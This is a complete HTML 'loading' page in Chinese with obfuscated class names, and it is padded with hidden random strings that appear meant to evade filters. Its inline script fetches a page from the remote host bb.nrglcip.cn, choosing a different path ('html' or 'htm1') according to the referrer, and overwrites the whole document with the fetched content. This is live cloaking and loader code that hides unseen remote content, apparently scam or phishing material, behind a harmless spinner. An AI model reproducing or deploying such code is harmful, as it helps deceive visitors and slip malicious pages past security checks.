<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .WkAq0KQ7h {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .WkAq0KQ7h .re3aWy {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .WkAq0KQ7h .content {
            line-height: 50px;
            text-align: center
        }

        .WkAq0KQ7h .img {
            width: 100%
        }

        .WkAq0KQ7h .eQnvQktZs {
            text-align: center
        }

        .WkAq0KQ7h .eQnvQktZs span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .WkAq0KQ7h .eQnvQktZs span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .WkAq0KQ7h .eQnvQktZs span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .WkAq0KQ7h .eQnvQktZs span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .WkAq0KQ7h .eQnvQktZs span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .WkAq0KQ7h .eQnvQktZs span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .WkAq0KQ7h .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function VeGJSKXAqBP(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var LaZslg = VeGJSKXAqBP('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ LaZslg +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ LaZslg +".html?a=share";
		}
		
        AWmOUMAWGY=url+"#"+new Date().getTime();
        AWmOUMAWGY && function() {
            $.get(AWmOUMAWGY, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >DtoZO654KAoXxDpc71RblEBbuUsaVAdThj8TABd2q9M48s0xPQO</ul>
<h1 style='display:none' >rsGpfclhqkJqTYjNatwjy4YnDAXwLEvCksG2WXiVSBHWIcs6womPqnMoYh</h1>
<img  src='' style='display:none'>
<ul style='display:none' >DtoZO654KAoXxDpc71RblEBbuUsaVAdThj8TABd2q9M48s0xPQO</ul>
<img  src='' style='display:none'>
<div style='display:none'>gM2H5ICI8BfCUjaeOWBZYDrWrHTaWXcbbniDNeUqWDPViWtWmREOsgj</div>
<span style='display:none'>Wm3L1SLoCQ7SRgWZoWSk15V8FA3cKX5hIb6QcaXZOsrBAATzBv96jFrmkf5xS08LT3cxE5IrUYVHPU0lsL2kp9vsKXbt</span><div class="WkAq0KQ7h">
    <div class="re3aWy">
        <div class="eQnvQktZs">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >WCmtdFnF7yt75vVLuKaVWTkhWu65aw5hjvf7i0D88RsHeRzPH8cxD9XOLd</b>
<p  style='display:none'>SWcmfJR53OFAbwCcTtlE33T7iK4KbyTeYoTq9oZdYa8kIlP8aGtQuGXdekbKQD94dn6EdGsiBkUBsBKTA8ZvJb2G</p>
<li style='display:none' >WYX9RAhlfLh8X1OgFASLJi680qqdh</li>
<h1 style='display:none' >To7DM38cSevUYzkjS6Vo0F6pdWAAnh3GonXqa4S6WRZmUZj5qruB44EAsNrMdu84Jqu6m</h1>
<ul style='display:none' >kmbwe8cB3PldgsIQPZhlXHI0wDgBgQgxKI7Wc9tbV8xADTNX0i</ul>
<ul style='display:none' >kmbwe8cB3PldgsIQPZhlXHI0wDgBgQgxKI7Wc9tbV8xADTNX0i</ul>
<div style='display:none'>k20MFi8ZX063PxBwLqyd</div>
<li style='display:none' >WYX9RAhlfLh8X1OgFASLJi680qqdh</li></body>
</html>